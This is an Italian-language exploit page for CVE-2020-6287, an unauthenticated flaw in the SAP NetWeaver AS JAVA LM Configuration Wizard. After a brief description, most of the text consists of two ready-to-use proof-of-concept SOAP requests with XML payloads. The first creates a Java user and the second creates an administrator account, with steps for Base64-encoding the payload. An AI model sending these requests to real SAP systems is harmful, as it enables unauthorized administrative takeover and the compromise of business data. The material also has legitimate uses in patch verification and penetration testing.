
[CVE-2020-6287] SAP NetWeaver AS JAVA (LM Configuration Wizard) Bypass di autenticazione (Crea utente Java semplice e amministratore)
[CVE-2020-6287] SAP NetWeaver AS JAVA (LM Configuration Wizard) Bypass di Autenticazione (Crea Utente Java Semplice e Amministratore)
SAP NetWeaver è la piattaforma tecnologica integrata di SAP e il fondamento tecnico di tutte le applicazioni SAP a partire da SAP Business Suite. SAP NetWeaver è una piattaforma applicativa e di integrazione orientata ai servizi che fornisce un ambiente di sviluppo ed esecuzione per le applicazioni SAP, e può essere utilizzato anche per sviluppo personalizzato e integrazione con altre applicazioni e sistemi. SAP NetWeaver AS JAVA (LM Configuration Wizard), versioni 7.30, 7.31, 7.40, 7.50, non esegue un controllo di autenticazione, permettendo a un attaccante senza autenticazione preventiva di eseguire attività di configurazione per compiere azioni critiche contro il sistema SAP Java, inclusa la capacità di creare un utente amministrativo, e quindi compromettendo la Confidenzialità, Integrità e Disponibilità del sistema, portando a una mancanza di controllo di autenticazione.
GET /CTCWebService/CTCWebServiceBean?wsdlProva di concetto (PoC) 1Prova di concetto (PoC) 2CVE-2020-6286Prova di concetto (PoC) 1: Crea utente Java semplice
Payload
<root>
<user>
<JavaOrABAP>java</JavaOrABAP>
<username>pentestuser</username>
<password>v3rystr0ngp@ssw0rd</password>
<userType></userType>
</user>
</root>
Codifica il payload sopra in Base64 e inseriscilo nel campo <BASE64_ENCODED_PAYLOAD_HERE> della richiesta sottostante
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 CVE-2020-6287 PoC
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\">
<soapenv:Header />
<soapenv:Body>
<urn:executeSynchronious>
<identifier>
<component>sap.com/tc~lm~config~content</component>
<path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path>
</identifier>
<contextMessages>
<baData>BASE64_ENCODED_PAYLOAD_HERE</baData>
<name>userDetails</name>
</contextMessages>
</urn:executeSynchronious>
</soapenv:Body>
</soapenv:Envelope>
Prova di concetto (PoC) 2: Crea utente Java amministratore
Payload
<PCK>
<Usermanagement>
<SAP_XI_PCK_CONFIG>
<roleName>Administrator</roleName>
</SAP_XI_PCK_CONFIG>
<SAP_XI_PCK_COMMUNICATION>
<roleName>ThisIsRnd9326</roleName>
</SAP_XI_PCK_COMMUNICATION>
<SAP_XI_PCK_MONITOR>
<roleName>ThisIsRnd5031</roleName>
</SAP_XI_PCK_MONITOR>
<SAP_XI_PCK_ADMIN>
<roleName>ThisIsRnd9846</roleName>
</SAP_XI_PCK_ADMIN>
<PCKUser>
<userName secure="true">pentestuser</userName>
<password secure="true">v3rystr0ngp@ssw0rd</password>
</PCKUser>
<PCKReceiver>
<userName>ThisIsRnd6461</userName>
<password secure="true">ThisIsRnd5525</password>
</PCKReceiver>
<PCKMonitor>
<userName>ThisIsRnd9457</userName>
<password secure="true">ThisIsRnd9037</password>
</PCKMonitor>
<PCKAdmin>
<userName>ThisIsRnd8386</userName>
<password secure="true">ThisIsRnd8477</password>
</PCKAdmin>
</Usermanagement>
</PCK>
Codifica il payload sopra in Base64 e inseriscilo nel campo <BASE64_ENCODED_PAYLOAD_HERE> della richiesta sottostante
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 CVE-2020-6287 PoC
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\">
<soapenv:Header />
<soapenv:Body>
<urn:executeSynchronious>
<identifier>
<component>sap.com/tc~lm~config~content</component>
<path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path>
</identifier>
<contextMessages>
<baData>BASE64_ENCODED_PAYLOAD_HERE</baData>
<name>userDetails</name>
</contextMessages>
</urn:executeSynchronious>
</soapenv:Body>
</soapenv:Envelope>